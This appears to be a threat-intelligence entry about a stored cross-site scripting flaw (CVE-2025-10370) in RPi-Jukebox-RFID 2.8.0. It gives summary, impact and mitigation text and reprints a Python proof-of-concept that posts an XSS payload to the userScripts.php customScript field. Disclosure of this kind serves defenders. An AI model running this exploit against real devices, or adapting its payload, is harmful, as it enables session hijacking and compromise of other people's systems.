RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
AI Analysis
Technical Summary
RPi-Jukebox-RFID 2.8.0 is affected by a stored cross-site scripting (XSS) vulnerability. This type of vulnerability enables attackers to inject malicious scripts into the application that are stored persistently and executed in the context of users viewing the affected content. The exploit code for this vulnerability is available in Python, indicating proof-of-concept or exploit development. No information about affected versions beyond 2.8.0 or vendor patches is provided.
Potential Impact
Successful exploitation of this stored XSS vulnerability could allow attackers to execute arbitrary scripts in the context of users interacting with the affected RPi-Jukebox-RFID interface. This may lead to session hijacking, defacement, or other client-side attacks depending on the application's context and user privileges. There is no indication of known exploits in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider restricting access to the affected interface and applying web application security controls such as input validation and output encoding to mitigate stored XSS risks.
Indicators of Compromise
- exploit-code: # Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370) # Date: 2025-09-25 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID # Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0 # Version: 2.8.0 # Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0 # CVE: CVE-2025-10370 # # Description: # This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page. # The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection # of arbitrary JavaScript payloads. import requests # Change this to the actual IP or hostname of the target device TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php" # The XSS payload PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>' # HTTP headers headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded", "Referer": TARGET, } # POST data with the malicious payload data = { "customScript": PAYLOAD } def send_exploit(): print(f"[+] Sending XSS payload to {TARGET}") try: r = requests.post(TARGET, headers=headers, data=data, timeout=5) print(f"[+] Payload sent. Status code: {r.status_code}") print("[*] If the target is vulnerable, the payload will execute when the page is rendered.") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": send_exploit()
RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
Description
RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
RPi-Jukebox-RFID 2.8.0 is affected by a stored cross-site scripting (XSS) vulnerability. This type of vulnerability enables attackers to inject malicious scripts into the application that are stored persistently and executed in the context of users viewing the affected content. The exploit code for this vulnerability is available in Python, indicating proof-of-concept or exploit development. No information about affected versions beyond 2.8.0 or vendor patches is provided.
Potential Impact
Successful exploitation of this stored XSS vulnerability could allow attackers to execute arbitrary scripts in the context of users interacting with the affected RPi-Jukebox-RFID interface. This may lead to session hijacking, defacement, or other client-side attacks depending on the application's context and user privileges. There is no indication of known exploits in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider restricting access to the affected interface and applying web application security controls such as input validation and output encoding to mitigate stored XSS risks.
Technical Details
- Edb Id
- 52470
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370) # Date: 2025-09-25 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID # Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0 # Version: 2.8.0 # Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0 # CVE: CVE-2025-10370 # # Description: # This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page. # The vulnerab... (1006 more characters)
Threat ID: 6981b62cf9fa50a62fb22400
Added to database: 2/3/2026, 8:47:40 AM
Last enriched: 4/7/2026, 11:05:21 AM
Last updated: 5/8/2026, 5:56:01 PM
Views: 145
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.